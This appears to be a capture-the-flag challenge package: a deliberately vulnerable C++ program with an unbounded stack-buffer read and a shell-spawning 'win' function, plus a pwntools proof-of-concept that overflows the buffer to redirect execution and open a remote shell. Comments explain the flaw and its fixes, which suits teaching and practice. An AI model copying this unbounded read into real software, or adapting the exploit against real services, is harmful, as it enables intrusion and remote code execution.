
1996
1996.cpp
// compile with -no-pie -fno-stack-protector
#include
#include
#include
using namespace std;
// Challenge "win" routine: replaces the current process image with /bin/bash.
// main() on this page never calls it, so it can only be reached when control
// flow is redirected; an unused shell-spawning helper like this should not be
// present in a production binary.
void spawn_shell() {
    const char* shell_path = "/bin/bash";

    // argv for the new image: program name followed by the terminating null.
    char* argv_list[2];
    argv_list[0] = const_cast<char*>(shell_path);
    argv_list[1] = NULL;

    // No environment block is passed (envp is NULL). The return value is not
    // checked: if execve fails, the function simply returns.
    execve(shell_path, argv_list, NULL);
}
// Challenge entry point: asks for an environment-variable name, reads it into
// a fixed 1024-byte stack buffer and prints "<name>=<value>".
// This is the deliberately vulnerable part of the exercise; the comments below
// mark what a reviewer would flag in production code.
int main() {
// Fixed-size stack buffer that receives the user-supplied name.
char buf[1024];
cout << "Which environment variable do you want to read? ";
// operator>> into a char array with no stream width set (before C++20) copies
// one whitespace-delimited token of any length, so input longer than buf is
// written past its end into adjacent stack memory. With the build flags in the
// header comment (no stack protector) nothing detects that overwrite.
// Reading into std::string, or setting the width first
// (cin >> setw(sizeof buf) >> buf), bounds the write.
cin >> buf;
// getenv() returns a null pointer for an unset name; streaming a null char*
// is undefined behaviour, so the result should be checked before printing.
// NOTE(review): a service that echoes arbitrary environment variables also
// discloses whatever secrets the environment holds.
cout << buf << "=" << getenv(buf) << endl;
}
exploit.py
# Proof-of-concept for the 1996 challenge binary listed above (pwntools script).
# It relies on that build's choices: -fno-stack-protector leaves no canary in
# front of the saved return address, and -no-pie keeps code addresses fixed,
# so a hard-coded address stays valid between runs. A bounded read in main()
# removes the overflow; default hardening (stack protector, PIE/ASLR) would
# make the overwrite detectable or the address unpredictable.
from pwn import *
# Connect to the challenge service.
p = remote('ctf.j0n9hyun.xyz',3015)
# Loads the local copy of the binary; `e` is not referenced again in this script.
e = ELF('./1996')
# Hard-coded code address, presumably spawn_shell() in the non-PIE binary
# (verify against the binary's symbol table).
shell = 0x400897
# 1048 filler bytes: the 1024-byte buf plus, presumably, 24 bytes of padding
# and saved frame pointer up to the return address (confirm in the disassembly).
payload = "A" * 1048
# p64 packs the address as 8 little-endian bytes.
# NOTE(review): appending it to a str suggests this was written for Python 2.
payload += p64(shell)
# Send the input as the "environment variable name" that main() reads.
p.sendline(payload)
# Hand the connection over to the terminal.
p.interactive()